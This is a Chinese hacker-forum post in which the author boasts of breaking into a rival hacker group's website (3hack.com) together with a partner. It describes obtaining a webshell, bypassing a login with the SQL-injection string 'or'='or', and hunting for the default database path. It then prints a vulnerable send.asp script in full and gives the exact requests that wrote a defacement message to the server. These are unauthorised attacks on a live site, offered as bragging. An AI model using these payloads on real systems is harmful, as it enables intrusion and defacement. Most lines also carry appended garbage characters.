|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量& Q6 X ^, h" P- n+ d2 B
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程, z2 S" G& m I* M/ {# p) N( s/ F
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
9 w5 Z) d$ e1 H我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
6 s+ {: _- a( }: e4 o! m' P/ D' K6 S首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的5 ?0 {7 b0 v, r$ b( F" ^
服务器应该防ARP,不过这还只是猜测
! b6 v; _' [9 ^! \$ m云中鸡说先不搞C段,PZ一下再说" Y- G2 m" Q6 R6 h* |9 u& ]
然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]5 L4 L8 x* X8 \- }# A
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............1 f' e, ^+ g) u, N$ h
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell6 l- Y: K; {- o, s" X. f* H
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT6 A4 h! g- J0 f- q7 _9 }! k
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn1 x1 }5 `% a6 l) A: f8 k* V
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
/ n8 @- ]4 d! R+ l0 u问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............0 ~7 Y' r7 R. B# Z9 I/ T0 ]
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~6 Y& N+ p+ q3 |, ^4 t
然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么2 E0 r: v; Q* w m% p) b
打开一看,如图1所示。
' H. Z( p/ |- B$ T- t, U2 g, ?' l) M: O- _1 r( x+ d- J
http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg0 T: j! D% d r
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
. P( S2 P0 N7 y2 n# S2 o6 i0 ~8 a
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg* `$ @7 h; H/ g! @/ t9 J
太帅了,真YD!!
( m7 }+ k, R2 Y% t这个页面应该是一套个人主页程序,而且还挺炫的! M: E* b1 b% K' {
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
9 h9 i% u, h; y- a3 M; u& i a7 g# m; `: V8 P
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg8 |8 z1 b2 h5 D; h9 I
嘿嘿,试着'or'='or'居然进去了!!如图4所示。5 f$ n0 Y; m% K7 ^
0 k* K1 H9 I7 }! Y5 t
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
8 H6 ^: x6 Z5 b4 E7 h& c! R* ]$ O经过半个多小时的摸索,还是没有发现可利用的地方。 c' ?; S1 I$ U- O% Z% i7 \! E
这下郁闷了,不管了,把这套程序下载下来看看吧
, k2 X: I+ N: `' s- J8 m: V找了一会才知道这套程序叫做“V时代个人flash主页”. p, P; h& r# V& J
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
$ Q" `2 q6 L8 p- }! p于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]] ^4 R8 ~ q( o2 L) _( Y4 n6 N4 R" n X
返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]; z- Z! ]: Y' {: j
同样是找不到页面,真晕!再看看!
! k% M2 T7 D$ F% \, q5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
1 ~% L) O5 Z- E5 b. n* y马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
R+ D& }6 r( y打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!) P$ ?* S$ q5 x- ~& O0 @
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:2 Y; j, q, O4 t: i" d
+ ~5 T# g! b. x( j- d3 s- ovar a/ Q* _/ E( Z5 Y0 u+ x( S- N
var b
' P) B& t) a- t5 }7 A/ Svar tx& a1 P$ B2 b1 L& \2 I9 F
var clean5 u- s- ~: n. j8 K
a=Request("re")
?8 ?, H/ K' K& ?+ zclean=Request("clean")2 S9 {+ E& h5 D( X; v* ?1 J! x
var jian="test.txt"
8 E( P" h9 l$ [7 V8 n* `/ @$ W1 d0 i3 S
if(clean==1){
5 i/ H6 b0 ^6 Utx="&a="
' d: L! s2 F% y, s' [var fs27 N J8 U: j8 V- G2 z
var fs2=Server.CreateObject("Scripting.FileSystemObject")
+ m, S& |! m' _6 ]& Lvar newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
8 ]& w( G- p* c7 S7 ], C( ]2 Anewdt.WriteLine("&a=")2 t* K: A4 [" A" }
newdt.close()) Z7 z8 I' {( R0 c" z
}6 i2 b( [; k+ |& ], ^
4 p: q1 }" s# H. _$ _
if(clean==0|clean==1){8 H7 x. p/ p) L! b! W
tx=""
) }: ^5 i. b, j. o1 T) e, Yvar fso = Server.Createobject("Scripting.FileSystemObject")
9 u; }. }% m/ s8 W% b, a8 ivar file = fso.OpenTextFile(Server.Mappath(jian))
c% e3 C; q7 t. owhile (!file.AtEndOfStream){/ F' C3 d5 N" t$ J: v
tx=file.ReadLine()
1 H! o. ]7 P. P8 K& VResponse.write (tx)
& x) m8 F1 F4 F( K* I}9 s- M0 D" t0 Z; W( `6 X, O
Response.write ("&")
% d! K4 D' b/ G) g* ofile.close()
8 S1 t% a# V% }$ B- o3 f}
# g- @3 E" N; L; @2 Y c0 H* x3 h; t% h) g5 P9 V
if(clean==2){
3 z2 h. Y: r# Y2 q! Dtx=""
: Z5 _, z8 z) n; S! z1 Gvar fso = Server.Createobject("Scripting.FileSystemObject")
$ E4 r, n+ Z& D5 H/ I) Evar file = fso.OpenTextFile(Server.Mappath(jian))
3 m# r8 J. z, Z) ?6 P0 z% ^+ y5 o! ~) W
var fs2
! g( R: U: I$ P$ B/ evar fs2=Server.CreateObject("Scripting.FileSystemObject")) Y1 d- E. c: d$ h; v0 S
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)" ]% Z; j7 ]" K5 e* `8 [0 \
8 D9 m+ Q+ Z$ q4 [) B! I2 l+ e2 M
) R) t" z, ^% W; T
while (!file.AtEndOfStream){
+ f, K3 J1 _0 ~tx=file.ReadLine()
; m. b& u; j2 x7 W& `1 DResponse.write (tx)}0 O- o$ U" L2 W. J/ Y
: t- ?6 e8 S( o8 OResponse.write (a+"&")
+ L- w2 K2 U: c9 dnewdt.WriteLine(a)
/ w7 y9 [ ^& r; |: J
# p m9 R, [( |file.close()
) H/ Z6 `; C( l( o6 b2 Znewdt.close()3 I) _# ?/ Z8 N/ R
}
/ M+ y5 V5 `7 I1 z. ~8 O2 Z: W1 z# q& _6 O8 {
9 u1 D$ d, }3 P
复制代码: U4 O# t/ c% K7 Y
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
8 h5 P9 B' ]# ^) l) \0 G; V接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”7 z) C) m, q. b7 V
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
7 y5 v$ y' z' R$ Y4 k6 U7 B过程如图5、6所示。. B* c' {1 H. |( t, m! i
9 J( f" c9 h) p s
http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg5 m( @! d- Y" T) c; T( l! N
' h" g- S: f" W http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
2 @& h9 |, ]! h7 a$ x' H: J& m4 Q2 ]提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。! C4 ^! n- }3 f- H& R- E
" V8 z1 D+ I" t1 d4 f/ d. M
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
( Y2 K+ _9 h* ]# o1 D# f这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的, P" K- B) n& w9 [6 w! R; `/ `
如果jian是经过request取值的话,同样也能搞到shell。; v: I, q+ {* i5 b0 B7 k& g0 r
这次只是装到了X,并没有拿到shell! l0 \) [- j! Z4 X8 I
已经是凌晨了,跟云中J说了声就睡觉去鸟& n; P$ \+ ?7 l) i( j
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
, ]" q* n2 F- Z( ]2 N7 h& O1 z就到这里吧,没技术含量,纯粹装X,高手们见笑了
* W- o/ G0 o' M" l另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己. s5 u8 Q: K1 X; a% m) h0 J; m
自己学不到技术,却还在自欺欺人% E; O9 a: t2 _7 x0 R: a* L* p
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
! g- R" t& f" F9 U- u" ~' F; v; I6 ]% s
|
|
发表于 2012-11-6 21:06:10
收藏
支持
反对